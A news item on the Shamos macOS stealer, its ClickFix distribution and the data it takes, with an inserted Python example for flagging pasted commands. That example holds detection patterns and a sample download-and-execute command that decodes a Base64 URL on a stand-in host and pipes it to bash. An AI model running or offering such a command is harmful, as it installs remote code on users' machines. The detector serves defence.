New Shamos malware, spread through fake Mac fixes, targets user information

CrowdStrike researchers announced that Shamos, a new variant of Atomic macOS Stealer (AMOS), deceives Mac users with ClickFix attacks and steals passwords, crypto wallets, Apple Notes and Keychain data.

Aug 27, 2025 - 11:12

A new information-stealing malware targeting Mac users has emerged. The malware, named Shamos, is distributed through fake troubleshooting guides and software installations.

Spread through ClickFix attacks

The attackers use fake GitHub repositories and malicious ads to direct users to run certain commands in Terminal.

The commands decode a Base64-encoded URL and download a Bash script from a remote server.
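The command shape described above can be recognized from its text alone, before anything is run. The following is an added example, not code from CrowdStrike or from the original article; the function names, the scoring threshold and the sample commands (which point at example.invalid) are constructed for illustration.

```python
import base64
import binascii
import re

B64_RUN = re.compile(r"[A-Za-z0-9+/]{16,}={0,2}")   # long Base64-looking token
DECODE = re.compile(r"\bbase64\s+(-d|-D|--decode)\b")
FETCH = re.compile(r"\b(curl|wget)\b")
SHELL_EXEC = re.compile(r"\|\s*(ba|z)?sh\b|\b(ba|z)?sh\s+-c\b|\beval\b")
URL = re.compile(r"https?://[^\s'\"]+")


def hidden_urls(command):
    """URLs that only become visible after Base64-decoding tokens of the command."""
    urls = []
    for token in B64_RUN.findall(command):
        try:
            text = base64.b64decode(token, validate=True).decode("utf-8")
        except (binascii.Error, UnicodeDecodeError):
            continue  # not valid Base64 text, e.g. a long file path
        urls.extend(URL.findall(text))
    return urls


def assess(command):
    """Inspect a pasted one-liner as text only; nothing is executed or fetched."""
    urls = hidden_urls(command)
    findings = []
    if DECODE.search(command):
        findings.append("decodes Base64 at run time")
    if urls:
        findings.append("hides URL: " + ", ".join(urls))
    if FETCH.search(command):
        findings.append("downloads remote content")
    if SHELL_EXEC.search(command):
        findings.append("hands the result to a shell")
    # Assumed threshold: obfuscation combined with download and execution.
    return {"suspicious": len(findings) >= 3, "findings": findings, "urls": urls}


# Constructed samples; example.invalid never resolves.
_ENC = base64.b64encode(b"https://example.invalid/install.sh").decode()
SAMPLE_CLICKFIX = f'/bin/bash -c "$(curl -fsSL $(echo {_ENC} | base64 -d))"'
SAMPLE_BENIGN = "curl -fsSL https://example.invalid/readme.txt -o readme.txt"

if __name__ == "__main__":
    for sample in (SAMPLE_CLICKFIX, SAMPLE_BENIGN):
        print(assess(sample))
```

A plain download with a visible URL scores below the threshold here; the check is tuned to the hidden-URL pattern this article describes, not to every risky one-liner.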

Shamos' capabilities

  • Detecting whether it is running in a virtual environment, using anti-VM checks
  • Collecting information about the device using AppleScript
  • Searching for and stealing browser data, Keychain items, Apple Notes content and crypto wallet files
  • Packing the collected data into “out.zip” and sending it to the attacker via curl
  • Creating a plist file under LaunchDaemons to gain persistence if it is run with administrator (sudo) privileges
  • Downloading additional payloads such as fake versions of the Ledger Live crypto wallet application and botnet modules

Warnings to users

Experts advise users not to run commands from online sources in Terminal unless they understand them, and to be especially careful with sponsored search results.

ClickFix tactics are becoming widespread

ClickFix attacks threaten not only Mac users, but also many platforms in general.

Source: Beykozun Sesi
